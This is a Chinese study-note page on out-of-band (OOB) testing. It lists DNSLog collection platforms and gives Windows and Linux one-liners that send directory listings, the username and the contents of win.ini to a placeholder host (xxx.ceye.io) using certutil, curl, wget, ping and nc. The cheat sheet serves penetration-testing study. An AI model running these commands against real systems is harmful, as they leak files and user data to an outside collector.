OOB

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

相关文章

在线监控平台

相关工具

uknowsec/SharpNetCheck - 该工具可以在 dnslog 中回显内网 ip 地址和计算机名，可实现内网中的快速定位可出网机器
ztgrace/mole - 识别和利用out-of-band (OOB)漏洞的burp扩展

平台搭建

平台

BugScanTeam/DNSLog - DNSLog 是一款监控 DNS 解析记录和 HTTP 访问记录的工具
lanyi1998/DNSlog-GO - DNSLog-GO 是一款 golang 编写的监控 DNS 解析记录的工具，自带 WEB 界面

chennqqi/godnslog

docker pull "sort/godnslog"
docker run -p80:8080 -p53:53/udp "sort/godnslog" serve -domain yourdomain.com -4 100.100.100.100
# yourdomain.com 替换为你的域名 100.100.100.100 替换为你的公网IP

yumusb/DNSLog-Platform-Golang - DNSLOG平台 golang 一键启动版
phith0n/conote-community - Conote 综合安全测试平台社区版
projectdiscovery/interactsh - An OOB interaction gathering server and client library
Buzz2d0/Hyuga - 一个用来检测带外(Out-of-Band)流量(DNS查询和HTTP请求)的监控工具
AbelChe/cola_dnslog
AlphabugX/Alphalog
Li4n0/revsuit - RevSuit is a flexible and powerful reverse connection platform designed for receiving connection from target host in penetration.

Windows

ping

ping %USERNAME%.xxx.ceye.io

ping -nc 4 %USERNAME%.xxx.ceye.io

certutil

使用 certutil 请求证书文件，并将下载文件重定向到 nul，无缓存、无需浏览器实现发起 http 请求
```
for /F %x in ('dir /b c:\') do certutil -urlcache -split -f "http://xxx.ceye.io/?result=%x" nul
```

curl

windows 环境默认是支持 curl 的

for /F %x in ('dir /b c:\') do curl http://xxx.ceye.io/%x

curl -F file=@C:\windows\win.ini http://xxx.ceye.io

linux

curl
```
curl http://xxx.ceye.io/%x
```
wget
```
wget http://xxx.ceye.io/%x
```
ping

linux 默认 ping 不带 -c 参数是会导致无限ping下去的,一定要带 -c
```
ping -c 4 xxx.ceye.io

ping -nc 4 xxx.ceye.io
```

openssl

openssl s_client -connect xxx.ceye.io:80

echo -e "GET / HTTP/1.1\nHost: http://xxx.ceye.io/%x\n\n" | nc xxx.ceye.io 80

dig
```
dig xxx.ceye.io
```

点击关注，共同学习！
安全狗的自我修养

github haidragon

https://github.com/haidragon

标签：http,ceye,OOB,xxx,ping,笔记,学习,io
From： https://www.cnblogs.com/haidragon/p/16851186.html

学习笔记-JWT 安全
JWT安全免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.关于JWT认证的基本知识点可见笔记认证&......
delphi TscSplitView控件学习笔记
一.先说效果吧,放置的位置不一样,显示出来的效果也不一样然后效果是这样的:注意位置标记1按钮的位置.当DisplayMode:=scsvmOverlay时,会遮挡TscSplitView......
Vue3学习笔记（四）——组件、生命周期
一、组件如果我们将一个页面中所有的处理逻辑全部放在一起，处理起来就会变得非常复杂，而且不利于后续的管理以及扩展，但如果，我们将一个页面拆分成一个个小的功能块，每个功能......
【笔记14】Javascript - 继承
【笔记14】Javascript-继承继承的概念不陌生，在原型、原型链那里，就知道一个对象能继承到原型很多属性和方法。各种继承的方法有优势有不足，看下继承发展史：继承传统形式：原型......
十月阅读笔记1
6、交流知道你想要说什么，当我们面临会议，重要通话，或者只是撰写技术文档，问下自己你要表达的中心想法是什么，围绕这一点进行展开。了解你的听众，选择风格，传达一个消息，可以是正......
十月阅读笔记2
8、正交性正交性是一个从几何学中借鉴而来的术语，如果两条直线相交成直角，他们就是正交的。这在向量中的解释是沿着一条直线移动，你投影到另一条直线上的位置不变。在计算机......
深度学习卷积、全连接层、深度可分离层参数量和FLOPs计算公式
来源卷积：输入尺寸，卷积核的大小为 * ，输出的尺寸大小为参数量（1）不考虑bias：（2）考虑bias：FLOPs（1）不考虑bias解释：先计算输出的中一个元素需要的计算量，即括号这一......
作业帮再创智能硬件新品类，发布喵喵机智能学习卡等四款新品
蓝鲸教育11月2日讯，昨日，作业帮举办喵喵机秋季新品发布会，发布喵喵智能学习卡、喵喵单词卡大屏触控版、喵喵错题打印机C2和喵喵儿童护眼仪，四款新品均搭载作业帮聪明学智能系统......
【Meetup明天见】OpenMLDB＋AutoX：整合自动特征工程，拥抱高效机器学习
明天上午10：00-12:00，开源机器学习数据库OpenMLDBMeetupNo.7准点开始！活动背景提供生产级实时数据及特征开发全栈解决方案的开源学习数据库OpenMLDB邀请到了开源自动机......
知网文献检索笔记
知网文献检索笔记前言大二上了一门文献检索的课。当时感兴趣做了一下笔记。现在参照一下。以后写论文的时候可以借鉴一下。不过当时学得有些表面了。当时我对于论文的感觉就......

学习笔记-OOB

OOB

免责声明

Windows

linux

相关文章

赞助商

阅读排行